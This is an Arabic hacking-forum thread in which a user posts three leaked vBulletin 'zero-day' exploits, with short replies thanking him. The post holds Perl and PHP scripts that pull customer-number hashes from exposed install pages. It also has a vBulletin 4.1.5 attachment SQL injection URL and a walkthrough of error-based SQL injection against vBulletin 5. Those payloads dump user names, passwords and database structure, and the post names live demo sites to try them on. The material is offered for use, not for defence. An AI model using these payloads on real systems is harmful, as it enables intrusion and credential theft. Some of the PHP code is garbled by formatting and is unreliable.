1. الملاحظات
  عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
  إستبعاد الملاحظة
الكاتب : سلطان القلوب | المشاهدات : 2,908 | الردود : 6
الوسوم:
حالة الموضوع:
مغلق
 1. سلطان القلوب DeveloPer Plus

  الأنتساب:
  ‏2 نوفمبر 2012
  المشاركات:
  19
  الإعجابات المتلقاة:
  1
  نقاط الجائزة:
  15
  الإقامة:
  D Z
  [​IMG]


  اخواني الكرام كيف حالك ان شاء الله بخير تكونو ياربي

  ثلالث ثغرات تم تسريبها من قبل المبدع The Injector

  vBulletin x.x.x Customer Area 0day  كود PHP:
  vBulletin x.x.x Customer Area 0day
  Perl script got  leaked  so decided to post the perl script here

  Code:
  #!/usr/bin/perl

  use LWP::UserAgent;
  use HTTP::Request::Common;


  system('cls');
  system('title vBulletin Install Auto Exploiter');
  print "\n ---------------------------------------";
  print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
  print " ---------------------------------------\n";
  print " + d4tabase.com -+- d4tabase.com + ";
  print "\n ---------------------------------------\n";
  print " coded by n0tch shoutz d4tabase crew ";
  print "\n ---------------------------------------\n";


  if($#ARGV == -1 or $#ARGV > 0)
  {
  print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
  exit;
  }


  $domain = $ARGV[0];
  $install_dir = "install";
  $full_domain = "http://$domain/$install_dir/upgrade.php";
  chop($domain);


  &search;
  sub search
  {
  $url = $full_domain;
  $lwp = LWP::UserAgent->new();
  $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
  $request = $lwp->post($url, ["searchHash" => "Search"]);


  print " Searching $domain ----\n ";
  if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
  {
  print "Result : $1\n";
  } else {
  print "Hash: Hash not found!\n";
  }
  }


  php exploit -
  --------------------


  <?php
  set_time_limit
  (0);


  if(
  $argc 2) {
      echo 
  "Usage: {$argv[0]} http://site.ru/forum" PHP_EOL;
      exit;
  }


  $URL $argv[1];
  $arr parse_url($URL);


  ### work with url
  if(strpos($URL'?')) die("Ohh, your URL is not valid");
  if(
  substr($URL, -11) != '/'$URL $URL '/';
  if(!
  $arr['scheme']) $URL 'http://' $URL;


  $headers get_headers($URL '/install/upgrade.php');
  if(
  substr($headers[0], 93) == '200') {
      
  $source file_get_contents($URL "/install/upgrade.php");
  }
  elseif(
  $headers get_headers($URL '/install/finalupgrage.php')) {
      if(
  substr($headers[0], 93) == '200'$source file_get_contents($URL "/install/finalupgrage.php");
  }
  else die(
  "something went wrong...");


  preg_match_all('|var CUSTNUMBER = "(.*?)";|'$source$res);
  foreach (
  $res[1] as $hash) {
      echo 
  "Hash: " $hash PHP_EOL;
      
  $fp fopen("hash.txt""a+");
      
  fwrite($fp$hash PHP_EOL);
  }
  ?>  vbulletin 4.1.5 attachment SQLI 0day
  كود PHP:
  vbulletin 4.1.5 attachment SQLI
  examine variables came across sq
  -injection, as later found to be inherent to all vbulletin 4.1.5TitleVulnerability in vBulletin 4.1.5 DorkPowered by Powered by vBulletin 4.1.5 ConditionsThe account on the forumPermission to attach files to messages themes (attachmentsRegister -> go to the forum -> click a topic or if the board isyou can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' - > Open the window and setting "values ​​[f]" insert our SQL queryExample:

  Code:
  http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
  After thatwe see the standard error of the database offlinethus opening the source code of the page and see:


  Code:
  <! -  
  Database error in vBulletin 4.1.5 :  

  Invalid SQL :  

               
  SELECT  
                   permissionsfrom 
  ,  Hidden ,  setpublish ,  publishdate ,  userid 
               FROM ds23fSDdfsdf_cms_node  
               WHERE  
                   nodeid  
  = - 1599  or ( ) = ( Select from Select name_const version () , ), name_const version (), )) );  

  MySQL Error    :  Duplicate column Name  .1.49-'5 '  
  Error Number   :  1060  
  Request Date   
  :  Tuesday ,  February 12th  2013   @  01 12 33 PM  
  Error Date     
  :  Tuesday ,  February 12th  2013   @  01 12 33  


  Address     
  :  127.0.0.1  
  Username       
  :  Hacker  
  Classname      
  :  vB_Database  
  MySQL Version  
  :   
  -> 

  vBulletin 5 SQL Injection
  كود PHP:
  vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
  _ _ _ _ _____ _____ ___ _____ _ ______ 
  | | | | | | | | | | | |/ _  |_ _| (_) | ___
  | |
  _| | __ _ ___| | ___ _ __ _ _ __ __| | | |/' |_ _| |/' / /_  | |_ __ ___ _ __ _ _ __ | |_ ___ _ __ __ _ ___ 
  |/ _` |/ __| |/ / | | |/ _` | '__/ _` | | /| \ \/ / /| | _ | | | '__| |/ _` | '_ \| _/ _ \| '__/ _` |/ 
  | | | | (_| | (__| <| |_| | (_| | | | (_| |  |_/ /> < |_/ / | | | | | | | (_) | | (_| | | | | || (_) | | | (_| | __/
  _| |_/__,_|___|_|___, |__,_|___,____//_/\_\\___/\_| |_/ \_/_| \___/| |\__,_|_| |_\_| \___/|_| \__, |\___|
  __/ | _/ | __/ | 
  |
  ___/ |__/ |___
  ____ ____ __ _ ______ ____ ____ 
  _ __
  __ )__ __/ / /__ / /_(_)___ ____/ / __ __ ____ ___ __
  | | / / __ / / / / / / __/ / __  /___  / / / / / / / __ `/ / / /
  | |/ / /_/ / /_/ / / / __/ /_/ / / / / ____/ / / /_/ / /_/ / /_/ / /_/ / 
  |___/_____/\__,_/_/_/\___/\__/_/_/ /_/ /_____/ \____/_____/\__,_/\__, / 
  /____/

  ************************************************** ****************
  #Title: vBulletin 5 SQL Injection > Beta Whatever
  #Author: 0x0A
  #Date: Dec 11, 2012
  #Category: web application
  #Type: SQL Injection
  #Requirements: Firefox/Live HTTP Headers/
  #Software Link: http://www.vbulletin.com/purchases/
  http://www.vbulletin.com/features/
  #Homepage: hackyard.net
  ***********.com
  #Version: 5 and above(not older versions)
  #Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
  #Demo sites to try: http://www.sultantheme.com/vb5connectforum/
  http://vb5connect.com/bb/
  ************************************************** ****************  -------------------------------------------------------------------
  -------------------------------------------------------------------
  How to
  -------------------------------------------------------------------
  -------------------------------------------------------------------


  -------------------------------------------------------------------
  ================================================== =================
  -------------------------------------------------------------------
  [#1] First of all, make an account to the vBulletin 5 forum,

  http://img402.imageshack.us/img402/7784/69376730.png
  -------------------------------------------------------------------
  ================================================== =================
  -------------------------------------------------------------------  -------------------------------------------------------------------
  ================================================== =================
  -------------------------------------------------------------------
  [#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)

  http://imageshack.us/a/img12/305/89268702.png
  -------------------------------------------------------------------
  ================================================== =================
  -------------------------------------------------------------------


  -------------------------------------------------------------------
  ================================================== =================
  -------------------------------------------------------------------
  [#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button,

  http://imageshack.us/a/img707/9990/68621087.png
  -------------------------------------------------------------------
  ================================================== =================
  -------------------------------------------------------------------


  -------------------------------------------------------------------
  ================================================== =================
  -------------------------------------------------------------------
  [#4] Then, on Send POST Content use this:

  -------------------------------------------------------------------------------------------------------------------------------------------------------------------
  nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
  -------------------------------------------------------------------------------------------------------------------------------------------------------------------

  http://imageshack.us/a/img42/1590/26447606.png

  //Note that to keep the noteid value as it was as default in the POST Content. Instead you
  `ll get invalid noteid error.
  The following SQLi command will fetch out the first record from user table(username/password).
  -------------------------------------------------------------------
  ================================================== =================
  -------------------------------------------------------------------
  -------------------------------------------------------------------
  ================================================== =================
  -------------------------------------------------------------------
  [
  #Other SQLi Syntaxes]

  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  |
  Version():
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  |
  User():
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  |
  Database():
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+


  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  |
  Database Print:
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7eFROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  |
  Table Count:
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7eFROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  |Print 
  Tables:
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7eFROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  |
  Columns of selected table:
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7eFROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  |
  Fetch Out Data:
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7eFROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
  +------------------------------------------------------------------------------------------------------------------------------------------------------------------+

  -------------------------------------------------------------------
  ================================================== =================
  -------------------------------------------------------------------

  |
   
  ' /
  -- (*) --
  >*<
  >0<@<
  >>>@<<*
  >@>*<0<<<
  >*>>@<<<@<<
  >@>>0<<<*<<@<
  >*>>0<<@<<<@<<<
  >@>>*<<@<>*<<0<*<
  \*/ >0>>*<<@<>0><<*<@<<
  ___\\U//___ >*>>@><0<<*>>@><*<0<<
  |\\ | | \\| >@>>0<*<0>>@<<0<<<*<@<< 
  | \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*<
  |\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<<
  Merry Xmas |\\_|_|&&_// ||*.*.*.*|_\\db//_ 
  """"|'
  .'.'.|~~|.*.*.*| ____|_
  |'.'.'.|  |____|>>>>>>|
  ~~~~~~~~ '""""
  `------'  ----------------------------------------------------

  ==[ That
  `s it!
  ==[ 
  Thanks0x0A!
  ==[ 
  Romania

  ----------------------------------------------------  
  :{1}::{1}::{1}:​
   
 2. روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

  الأنتساب:
  ‏8 نوفمبر 2012
  المشاركات:
  654
  الإعجابات المتلقاة:
  1
  نقاط الجائزة:
  50
  عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
  كتب الله لك أجر كل من استفاد منها.

  * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
  حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

  هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

   
 3. ĦAML3Ŧ Developer

  الأنتساب:
  ‏18 يناير 2012
  المشاركات:
  19
  الإعجابات المتلقاة:
  0
  نقاط الجائزة:
  5
  الإقامة:
  هَنـآك .!
  رد: vbulletin 4.1.5 & vBulletin 5 & vBulletin x.x.x 0day

  مشكوور كتير يا غالى,
   
 4. يوسف العراقي Developer

  الأنتساب:
  ‏5 نوفمبر 2012
  المشاركات:
  58
  الإعجابات المتلقاة:
  0
  نقاط الجائزة:
  30
  الإقامة:
  العراق
  رد: vbulletin 4.1.5 & vBulletin 5 & vBulletin x.x.x 0day

  *:" Thank's
   
 5. سلطان القلوب DeveloPer Plus

  الأنتساب:
  ‏2 نوفمبر 2012
  المشاركات:
  19
  الإعجابات المتلقاة:
  1
  نقاط الجائزة:
  15
  الإقامة:
  D Z
  رد: vbulletin 4.1.5 & vBulletin 5 & vBulletin x.x.x 0day

  لاشكر علي واجب

  لاهنت على المرور :{12}:
   
 6. سلطان القلوب DeveloPer Plus

  الأنتساب:
  ‏2 نوفمبر 2012
  المشاركات:
  19
  الإعجابات المتلقاة:
  1
  نقاط الجائزة:
  15
  الإقامة:
  D Z
  رد: vbulletin 4.1.5 & vBulletin 5 & vBulletin x.x.x 0day

  You are welcome​
   
 7. Ĝυēναяα Developer

  الأنتساب:
  ‏21 يونيو 2012
  المشاركات:
  103
  الإعجابات المتلقاة:
  2
  نقاط الجائزة:
  50
  الإقامة:
  فلسطين
  رد: vbulletin 4.1.5 & vBulletin 5 & vBulletin x.x.x 0day

  يع ـطيك الع ـافيه يا قلبو

  ما تح ـرمنا من ج ـديدك
   
حالة الموضوع:
مغلق

مشاركة هذه الصفحة